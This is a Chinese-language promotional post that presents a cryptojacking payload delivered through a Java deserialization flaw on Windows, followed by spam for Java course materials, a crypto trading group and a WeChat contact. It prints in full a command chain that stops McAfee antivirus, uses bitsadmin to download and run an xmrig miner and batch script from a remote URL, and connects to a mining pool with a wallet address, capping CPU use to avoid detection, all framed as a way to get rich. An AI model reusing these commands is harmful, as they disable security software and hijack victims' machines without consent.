现在很多人都热衷于挖矿。俨然,挖矿成为了人们一种新兴的赚取资本的手段了。可是当你开始挖的时候就会发现,身边的那些电脑大神使用自己的电脑技术已经赚得盆满钵满了。这让我们十分嫉妒,今天我就分享下如何用java反序列化漏洞在Windows上的挖矿实验。
攻击代码如下:
cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;
实际的Payload分析
关闭McAfee反病毒软件(我不明白社区中的这种技术为啥只关掉McAfee…):
netstop "McAfee McShield;netstop mcafeeframework;
使用bitsadmin从GitHub下载加密货币挖矿程序和一个batch脚本文件:
bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;
Batch脚本文件代码如下:
taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1
首先,上述代码会终止其他xmrig进程(可能是为了防止资源竞争)。接下来,它会关闭McAfee。然后便会开启挖矿程序,并跟http://monerohash.com矿池(端口3333)进行连接。它只会占用大约50%的CPU资源,估计是为了避免被检测到吧。
可是很多小白说我并不会使用java啊,那要怎么办?今天我就在这里分享我学习java时所用的入门资料,这份资料真的很全面,帮助我快速入门。废话少说,让我们来看看吧
想不想挖更多的矿呢?想象一下,每当自己使用学会电脑技术去得到更多的回报是不是很心动呢?那么就快点关注并私聊我吧,我会分享给你最全面的java入门资料的
最后希望各位矿工学习了以后可以挖到更多的框
添加新手交流群:币种分析、每日早晚盘分析
添加助理微信,一对一亲自指导:YoYo8abc
